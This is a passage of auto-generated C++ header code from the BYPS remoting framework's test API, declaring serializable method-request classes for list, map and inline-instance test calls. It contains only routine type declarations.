public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setPoint2DListList
// typeId=730520735
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setPoint2DListList : public BMethodRequest {
public: byps_ptr< ::std::vector< byps::test::api::inl::PVectorPoint2D > > pointListList;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setPoint2DListList();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setPoint2DListList(const byps_ptr< ::std::vector< byps::test::api::inl::PVectorPoint2D > >& pointListList);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setPoint2DMap
// typeId=127469879
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setPoint2DMap : public BMethodRequest {
public: byps::test::api::inl::PMapIntegerPoint2D pointMap;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setPoint2DMap();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setPoint2DMap(const byps::test::api::inl::PMapIntegerPoint2D& pointMap);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getBoolean1
// typeId=2058662161
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getBoolean1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getBoolean1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getByte1
// typeId=608486403
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getByte1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getByte1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getByte2
// typeId=608486404
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getByte2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getByte2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getChar1
// typeId=608885621
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getChar1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getChar1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getDate1
// typeId=609618461
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getDate1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getDate1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getDouble1
// typeId=2129490906
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getDouble1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getDouble1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getFloat1
// typeId=1785569467
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getFloat1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getFloat1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getInt1
// typeId=2098036488
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getInt1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getInt1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getInt2
// typeId=2098036489
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getInt2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getInt2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getInt3
// typeId=2098036490
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getInt3 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getInt3();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getInt4
// typeId=2098036491
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getInt4 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getInt4();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getLong1
// typeId=617417999
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getLong1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getLong1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getObj1
// typeId=2098203392
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getObj1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getObj1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getPrimitiveTypes1
// typeId=1679973895
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getPrimitiveTypes1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getPrimitiveTypes1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getShort1
// typeId=2140896613
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getShort1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getShort1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_getString1
// typeId=1597237350
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_getString1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_getString1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setBoolean1
// typeId=2147241989
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setBoolean1 : public BMethodRequest {
public: byps::PVectorBoolean boolean1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setBoolean1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setBoolean1(const byps::PVectorBoolean& boolean1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setByte1
// typeId=47373943
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setByte1 : public BMethodRequest {
public: byps::PVectorByte byte1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setByte1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setByte1(const byps::PVectorByte& byte1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setByte2
// typeId=47373944
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setByte2 : public BMethodRequest {
public: byps_ptr< ::std::vector< PBytes > > byte2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setByte2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setByte2(const byps_ptr< ::std::vector< PBytes > >& byte2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setChar1
// typeId=47773161
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setChar1 : public BMethodRequest {
public: byps::PVectorCharacter char1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setChar1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setChar1(const byps::PVectorCharacter& char1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setDate1
// typeId=48506001
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setDate1 : public BMethodRequest {
public: byps::PVectorDate obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setDate1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setDate1(const byps::PVectorDate& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setDouble1
// typeId=228671154
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setDouble1 : public BMethodRequest {
public: byps::PVectorDouble double1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setDouble1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setDouble1(const byps::PVectorDouble& double1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setFloat1
// typeId=1570952391
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setFloat1 : public BMethodRequest {
public: byps::PVectorFloat float1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setFloat1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setFloat1(const byps::PVectorFloat& float1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setInt1
// typeId=136821228
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setInt1 : public BMethodRequest {
public: byps::PVectorInteger int1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setInt1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setInt1(const byps::PVectorInteger& int1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setInt2
// typeId=136821227
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setInt2 : public BMethodRequest {
public: byps_ptr< ::std::vector< PArrayInt > > int2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setInt2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setInt2(const byps_ptr< ::std::vector< PArrayInt > >& int2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setInt3
// typeId=136821226
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setInt3 : public BMethodRequest {
public: byps_ptr< ::std::vector< byps::PVectorInteger > > int3;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setInt3();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setInt3(const byps_ptr< ::std::vector< byps::PVectorInteger > >& int3);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setInt4
// typeId=136821225
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setInt4 : public BMethodRequest {
public: byps_ptr< ::std::vector< byps_ptr< ::std::map< int32_t , byps_ptr< ::std::vector< byps::PSetInteger > > > > > > int4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setInt4();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setInt4(const byps_ptr< ::std::vector< byps_ptr< ::std::map< int32_t , byps_ptr< ::std::vector< byps::PSetInteger > > > > > >& int4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setLong1
// typeId=56305539
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setLong1 : public BMethodRequest {
public: byps::PVectorLong long1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setLong1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setLong1(const byps::PVectorLong& long1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setObj1
// typeId=136654324
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setObj1 : public BMethodRequest {
public: byps::PVectorObject obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setObj1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setObj1(const byps::PVectorObject& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setPrimitiveTypes1
// typeId=759940243
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setPrimitiveTypes1 : public BMethodRequest {
public: byps::test::api::prim::PVectorPrimitiveTypes primitiveTypes1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setPrimitiveTypes1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setPrimitiveTypes1(const byps::test::api::prim::PVectorPrimitiveTypes& primitiveTypes1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setShort1
// typeId=1939453607
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setShort1 : public BMethodRequest {
public: byps::PVectorShort short1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setShort1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setShort1(const byps::PVectorShort& short1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteListTypes_setString1
// typeId=339567886
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteListTypes_setString1 : public BMethodRequest {
public: byps::PVectorString string1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteListTypes_setString1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteListTypes_setString1(const byps::PVectorString& string1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getBoolean1
// typeId=885803255
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getBoolean1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getBoolean1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getByte1
// typeId=124722647
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getByte1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getByte1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getByte2
// typeId=124722646
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getByte2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getByte2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getChar1
// typeId=124323429
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getChar1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getChar1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getDate1
// typeId=123590589
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getDate1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getDate1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getDouble1
// typeId=1890230400
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getDouble1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getDouble1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getFloat1
// typeId=530925397
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getFloat1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getFloat1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getInt1
// typeId=827458594
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getInt1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getInt1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getInt2
// typeId=827458595
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getInt2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getInt2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getLong1
// typeId=115791051
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getLong1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getLong1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getObj1
// typeId=827625498
namespace byps { namespace test { namespace api { namespace remote {
